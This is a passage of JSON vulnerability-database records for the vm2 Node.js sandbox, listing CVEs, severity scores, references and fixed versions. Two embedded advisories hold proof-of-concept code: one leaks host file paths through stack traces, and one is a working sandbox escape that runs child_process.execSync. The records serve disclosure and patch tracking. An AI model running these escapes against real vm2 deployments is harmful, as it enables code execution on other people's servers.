vm.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-32313.json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-32313.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-32313","reference_id":"","reference_type":"","scores":[{"value":"0.00668","scoring_system":"epss","scoring_elements":"0.71716","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00712","scoring_system":"epss","scoring_elements":"0.72728","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00712","scoring_system":"epss","scoring_elements":"0.72721","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00712","scoring_system":"epss","scoring_elements":"0.72697","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00712","scoring_system":"epss","scoring_elements":"0.7271","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-32313"},{"reference_url":"https://gist.github.com/arkark/c1c57eaf3e0a649af1a70c2b93b17550","reference_id":"","reference_type":"","scores":[{"value":"5.3
","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-22T21:42:52Z/"}],"url":"https://gist.github.com/arkark/c1c57eaf3e0a649af1a70c2b93b17550"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/5206ba25afd86ef547a2c9d48d46ca7a9e6ec238","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-22T21:42:52Z/"}],"url":"https://github.com/patriksimek/vm2/commit/5206ba25afd86ef547a2c9d48d46ca7a9e6ec238"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/3.9.18","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-22T21:42:52Z/"}],"url":"https://github.com/patriksimek/vm2/releases/tag/3.9.18"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2208377","reference_id":"2208377","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2208377"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-3
2313","reference_id":"CVE-2023-32313","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-32313"},{"reference_url":"https://github.com/advisories/GHSA-p5gc-c584-jj6v","reference_id":"GHSA-p5gc-c584-jj6v","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p5gc-c584-jj6v"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-p5gc-c584-jj6v","reference_id":"GHSA-p5gc-c584-jj6v","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-22T21:42:52Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-p5gc-c584-jj6v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/65112?format=json","purl":"pkg:npm/vm2@3.9.18","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqm5-bhj5-k3cf"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-ku6f-9qqg-aqe6"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability"
:"VCID-v8ca-8eew-aqah"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.9.18"}],"aliases":["CVE-2023-32313","GHSA-p5gc-c584-jj6v"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-75hb-ytcw-4khu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/42379?format=json","vulnerability_id":"VCID-7k1u-5wfd-sfgn","summary":"Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')\nThe package vm2 is vulnerable to Sandbox Bypass via direct access to host error objects generated by node internals during generation of a stacktraces, which can lead to execution of arbitrary code on the host machine.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-23555.json","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-23555.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-23555","reference_id":"","reference_type":"","scores":[{"value":"0.01127","scoring_system":"epss","scoring_elements":"0.78668","published_at":"2026-06-09T12:55:00Z"},{"value":"0.01127","scoring_system":"epss","scoring_elements":"0.7865","published_at":"2026-06-08T12:55:00Z"},{"value":"0.01127","scoring_system":"epss","scoring_elements":"0.78663","published_at":"2026-06-07T12:55:00Z"},{"value":"0.01127","scoring_system":"epss","scoring_elements":"0.78672","published_at":"2026-06-06T12:55:00Z"},{"value":"0.01127","scoring_system":"epss","scoring_elements":"0.78664","published_at":"2026-06-05T12:55:00Z"},{"value":"0.01127","scoring_system":"epss","scoring_elements":"0.
78637","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-23555"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/532120d5cdec7da8225fc6242e154ebabc63fe4d","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/commit/532120d5cdec7da8225fc6242e154ebabc63fe4d"},{"reference_url":"https://snyk.io/vuln/SNYK-JS-VM2-2309905","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://snyk.io/vuln/SNYK-JS-VM2-2309905"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2054114","reference_id":"2054114","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2054114"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23555","reference_id":"CVE-2021-23555","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23555"},{"reference_url":"https://github.com/advisories/GHSA-6pw2-5hjv-9pf7","reference_id":"GHSA-6pw2-5hjv-9pf7","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"u
rl":"https://github.com/advisories/GHSA-6pw2-5hjv-9pf7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/60608?format=json","purl":"pkg:npm/vm2@3.9.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1p1e-z4rv-1bfn"},{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4dwc-b66t-cuf8"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-75hb-ytcw-4khu"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-d6mv-1b7h-5fef"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqm5-bhj5-k3cf"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hhxv-v932-cuf7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-jv3n-721k-z3h7"},{"vulnerability":"VCID-ku6f-9qqg-aqe6"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-v8ca-8eew-aqah"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"},{"vulnerability":"VCID-zz97-v3rg-1bck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.9.6"}],"aliases":["CVE-2021-23555","GHSA-6pw2-5hjv-9pf7"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7k1u-5wfd-sfgn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/93399?format=json","vulnerability_id":"VCID-8s8x-85t4-m7cg","summary":"vm2 is Vulnerable to Host File Path Disclosure via Stack Trace Information Leak\n### Summary\nvm2's `CallSite` wrapper class (intended as a safe wrapper for V8's native CallSite) blocks `getThis()` and `getFunction()` to prevent host object leakage, but allows 
`getFileName()` to return unsanitized host absolute paths. Any sandboxed code can extract the full directory structure, library paths, and framework versions of the host server.\n\n### Details\nIn `lib/setup-sandbox.js:436-466`, the `CallSite` class overrides `getThis()` and `getFunction()` with `undefined` to prevent host object references from leaking into the sandbox. However, the following methods pass through unsanitized values from the original V8 CallSite object:\n\n- `getFileName()` — returns host absolute paths like `/app/node_modules/vm2/lib/vm.js`\n- `getLineNumber()`, `getColumnNumber()` — exact source locations\n- `getFunctionName()`, `getMethodName()`, `getTypeName()` — internal function names\n\nTwo exploitation paths exist:\n1. **Default `error.stack`**: `new Error().stack` includes host frame paths in the formatted string\n2. **Custom `prepareStackTrace`**: Attacker can set `Error.prepareStackTrace` to directly call `getFileName()` on each CallSite, extracting a clean list of all host paths\n\n### PoC\n\n**Library-level PoC (Node.js script — primary):**\n```javascript\nconst { VM } = require(\"vm2\");\nconst vm = new VM();\n\n// Path A — Default error.stack\nconst result1 = vm.run(`try { null.x; } catch(e) { e.stack }`);\nconsole.log(result1);\n// Output includes: /app/node_modules/vm2/lib/vm.js:289:18\n//                   /app/src/server.js:49:20\n\n// Path B — prepareStackTrace extraction\nconst result2 = vm.run(`\n  Error.prepareStackTrace = function(e, sst) {\n    return sst.map(function(s) { return s.getFileName(); }).join(\", \");\n  };\n  new Error().stack\n`);\nconsole.log(result2);\n// Output: vm.js, node:vm, /app/node_modules/vm2/lib/vm.js, /app/src/sandbox.js, ...\n```\n\n**HTTP demonstration:**\n```bash\n# Default error.stack\ncurl -s -X POST http://localhost:3000/api/execute \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"code\":\"try { null.x; } catch(e) { e.stack }\"}'\n# Result includes host paths: /app/src/server.js, 
/app/node_modules/express/...\n\n# prepareStackTrace extraction\ncurl -s -X POST http://localhost:3000/api/execute \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"code\":\"Error.prepareStackTrace = function(e, sst) { return sst.map(function(s) { return s.getFileName(); }).join(\\\", \\\"); }; new Error().stack\"}'\n# Result: /app/node_modules/vm2/lib/vm.js, /app/src/sandbox.js, /app/src/server.js, ...\n```\n\n### Impact\n- **Information Disclosure**: Host directory structure, library paths, framework versions, and internal architecture are exposed to sandboxed code.\n- **Attack Chain**: Leaked paths enable precise targeting for other vulnerabilities.\n- **Scope**: All applications using vm2. No special configuration required.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44002","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11077","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.1101","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.10996","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.1112","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11113","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44002"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","
scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-v27g-jcqj-v8rw","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-14T18:23:24Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-v27g-jcqj-v8rw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44002","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44002"},{"reference_url":"https://github.com/advisories/GHSA-v27g-jcqj-v8rw","reference_id":"GHSA-v27g-jcqj-v8rw","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v27g-jcqj-v8rw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114499?format=json","purl":"pkg:npm/vm2@3.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.0"}],"aliases":["CVE-2026-44002","GHSA-v27g-jcqj-v8rw"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"htt
p://public2.vulnerablecode.io/vulnerabilities/VCID-8s8x-85t4-m7cg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/45185?format=json","vulnerability_id":"VCID-d6mv-1b7h-5fef","summary":"Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')\nvm2 is a sandbox that can run untrusted code with Node's built-in modules. A sandbox escape vulnerability exists in vm2 for versions up to and including 3.9.17. It abuses an unexpected creation of a host object based on the specification of `Proxy`. As a result a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version `3.9.18` of `vm2`. Users are advised to upgrade. There are no known workarounds for this vulnerability.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-32314.json","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-32314.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-32314","reference_id":"","reference_type":"","scores":[{"value":"0.61685","scoring_system":"epss","scoring_elements":"0.9836","published_at":"2026-06-08T12:55:00Z"},{"value":"0.61685","scoring_system":"epss","scoring_elements":"0.98358","published_at":"2026-06-09T12:55:00Z"},{"value":"0.64898","scoring_system":"epss","scoring_elements":"0.98491","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-32314"},{"reference_url":"https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textu
al","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-01-22T21:42:22Z/"}],"url":"https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/d88105f99752305c5b8a77b63ddee3ec86912daf","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-01-22T21:42:22Z/"}],"url":"https://github.com/patriksimek/vm2/commit/d88105f99752305c5b8a77b63ddee3ec86912daf"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/3.9.18","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-01-22T21:42:22Z/"}],"url":"https://github.com/patriksimek/vm2/releases/tag/3.9.18"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2208376","reference_id":"2208376","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2208376"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-32314","reference_id":"CVE-2023-32314","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/
AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-32314"},{"reference_url":"https://github.com/advisories/GHSA-whpj-8f3w-67p5","reference_id":"GHSA-whpj-8f3w-67p5","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-whpj-8f3w-67p5"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-whpj-8f3w-67p5","reference_id":"GHSA-whpj-8f3w-67p5","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-01-22T21:42:22Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-whpj-8f3w-67p5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/65112?format=json","purl":"pkg:npm/vm2@3.9.18","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqm5-bhj5-k3cf"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-ku6f-9qqg-aqe6"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-v8ca-8eew-aqah"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},
{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.9.18"}],"aliases":["CVE-2023-32314","GHSA-whpj-8f3w-67p5"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-d6mv-1b7h-5fef"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/95911?format=json","vulnerability_id":"VCID-ej5b-1m7b-hkf8","summary":"vm2 has a Sandbox Escape Vulnerability\n### Summary\n\nIt is possible to reach `BaseHandler.getPrototypeOf`, which can be used to get arbitrary prototypes\n\n### Details\n\nhttps://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658\n\n`BaseHandler` can be reached via `util.inspect` (same as https://github.com/patriksimek/vm2/commit/57971fa423abeb66f09e47e18102986549474ca8)\n\n### PoC\n```js\nlet obj = {\n\tsubarray: Buffer.prototype.inspect,\n\tslice: Buffer.prototype.slice,\n\thexSlice: () => '',\n};\n\nlet sym;\n\nobj.slice(10, {\n\tshowHidden: true,\n\tshowProxy: true,\n\tdepth: 10,\n\tstylize(a) {\n\t\tconst handler = this.seen && this.seen[1];\n\n\t\tif (handler && handler.getPrototypeOf) {\n\t\t\tgP = handler.getPrototypeOf;\n\t\t\tHObjectProto = gP(gP(gP(gP(Buffer))));\n\t\t\tHObject = HObjectProto.constructor;\n\t\t\tsym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);\n\t\t}\n\t\treturn a;\n\t},\n});\n\nobj = {\n\t[sym]: (depth, opt, inspect) => {\n\t\tinspect.constructor('return process')()\n\t\t.getBuiltinModule('child_process')\n\t\t.execSync('id', { stdio: 'inherit' });\n\t},\n\tvalueOf: undefined,\n\tconstructor: undefined,\n};\n\nWebAssembly.compileStreaming(obj).catch(() => {});\n```\n\n### Impact\nSandbox Escape -> 
RCE","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44006","reference_id":"","reference_type":"","scores":[{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.19325","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.19395","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.19439","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.1935","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.19446","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44006"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0"},{"reference_url":"https://github.com/patriksimek/vm2
/security/advisories/GHSA-qcp4-v2jj-fjx8","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-13T18:09:17Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-qcp4-v2jj-fjx8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44006","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL